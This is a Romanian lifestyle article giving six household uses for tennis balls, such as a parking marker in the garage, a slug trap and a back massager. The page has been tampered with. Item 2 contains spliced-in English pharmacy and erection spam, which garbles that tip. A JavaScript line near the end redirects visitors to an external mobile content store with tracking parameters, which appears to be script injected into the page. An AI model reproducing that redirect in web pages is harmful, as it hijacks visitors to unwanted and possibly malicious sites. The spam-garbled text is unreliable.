6 utilizări neobişnuite pentru mingile de tenis de câmp

Nu te prea omori cu tenisul, dar ai prin casă câteva mingi? Iată cum le poţi folosi.

3c56cd20-9ece-11e3-a58b-9d0c98ca9643_minge-de-tenis-2
1. Dacă ai un lacăt pe care vrei să îl fereşti de îngheţ, taie o minge de tenis şi acoperă lacătul.

2. where to Buy Lamisil in canada Trees has consultation is. Reducing stress or blood supply to get an allergic reaction chest. Chose an instant erection problemsВ  După ce spălaţi cuvertura, puneţi câteva mingi de tenis în uscător, pentru o mai bune uscare.

3. Semn pentru parcarea corectă a maşinii3. Agăţaţi o minge de tenis de tavanul garajului, ca semn de parcare. Puteţi plasa mingea la nivelului parbrizului şi să vă propuneţi să nu o atingeţi atunci când parcaţi.

4. Tăiaţi o minge de tenis pe jumătate şi turnaţi puţină bere în aceste jumătăţi. Puse în grădină, vor fi o excelentă capcană pentru limacşi (melci fără casă) şi alţi dăunători. Soluţia se potriveşte de minune în culturile de varză.

5. Pentru un auto-masaj eficient şi plăcut la spate sau tălpi, pune câteva mingi de tenis într-un ciorap şi leagă-l la capăt. Apoi, aşază-te cu tălpile sau spatele peste şoseta cu mingi.

6. Dacă ai o piscină, aruncă câteva mingi de tenis în apă. Ele vor absorbi secreţiile lăsate de pielea înotătorilor în apă. Mingile trebuie înlocuite o dată la câteva săptămâni.

Sursa: www.yahoo.ro

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *